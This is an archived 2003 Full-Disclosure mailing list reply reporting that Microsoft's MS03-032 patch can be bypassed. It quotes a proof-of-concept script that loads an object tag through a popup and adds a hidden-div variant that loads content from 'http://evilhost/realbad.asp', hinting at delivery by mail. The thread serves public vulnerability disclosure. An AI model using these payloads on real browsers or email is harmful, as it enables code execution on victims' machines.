[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

To: <1@xxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
From: "morning_wood" <se_cur_ity@xxxxxxxxxxx>
Date: Mon, 8 Sep 2003 03:02:45 -0700

----- Original Message ----- 
From: "http-equiv@xxxxxxxxxx" <1@xxxxxxxxxxx>
To: <full-disclosure@xxxxxxxxxxxxxxxx>
Sent: Sunday, September 07, 2003 6:17 AM
Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032


> 
> 
> Since the cat somehow got out of the bag, and more importantly, this 
> is so blatantly obvious, herewith is the "Bad News":
> 
> The patch for Drew's object data=funky.hta doesn't work:
> 
> http://www.malware.com/badnews.html
> 
> <script>
>   var oPopup = window.createPopup();
> 
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>

this works too...

<div style="display.none"><object data="http://evilhost/realbad.asp";>
</object>oh</div>

beware the mail... 
                            and the rewtXSS skillz


Donnie Werner
morning_wood@xxxxxxxxxxxxxxx
http://exploitlabs.com 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
  - From: http-equiv@xxxxxxxxxx

References:
- [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
  - From: http-equiv@xxxxxxxxxx

Prev by Date: Re: [Full-Disclosure] Ankit Fadia - A Reality
Next by Date: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Previous by thread: RE: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Next by thread: Re: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
Index(es):
- Date
- Thread